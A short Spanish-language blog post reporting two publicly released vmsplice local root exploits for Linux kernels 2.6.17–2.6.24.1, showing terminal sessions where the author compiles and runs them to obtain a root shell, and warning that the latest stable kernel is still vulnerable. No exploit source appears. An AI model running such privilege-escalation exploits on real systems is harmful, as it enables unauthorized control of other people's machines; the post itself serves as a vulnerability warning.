Mirando mis nuevos feeds, observé en http://milw0rm.org/ que salieron dos exploits para Linux Kernel:
| Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit | |||||||
| Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit |
Primer Exploit:
[zh3ta@ArchLinux ~]$ touch exploit.c
[zh3ta@ArchLinux ~]$ vi exploit.c
[zh3ta@ArchLinux ~]$ gcc exploit.c -o explotar
[zh3ta@ArchLinux ~]$ ./explotar
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] addr: 0xc011e730
[+] root
[root@ArchLinux ~]#
---------------------------------------------------------------------------------------------------------------------------------------
Segundo Exploit:
[zh3ta@ArchLinux ~]$ touch exploit2.c
[zh3ta@ArchLinux ~]$ vi exploit2.c
[zh3ta@ArchLinux ~]$ gcc exploit2.c -o explotar2
[zh3ta@ArchLinux ~]$ ./explotar2
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e15000 .. 0xb7e47000
[+] root
[root@ArchLinux ~]#
Funcionan perfectos :P. Pero lo malo de esto es que entre a la pagina de http://www.kernel.org y quise actualizar mi kernel pero oh! sorpresa el ultimo kernel estable es:
The latest stable version of the Linux kernel is: 2.6.24.1
Por lo tanto el segundo exploit dice que este kernel también es vulnerable :S. Así que a tener mucho cuidado con esto. Saludos :).
Por lo tanto el segundo exploit dice que este kernel también es vulnerable :S. Así que a tener mucho cuidado con esto. Saludos :).
0 comentarios:
Post a Comment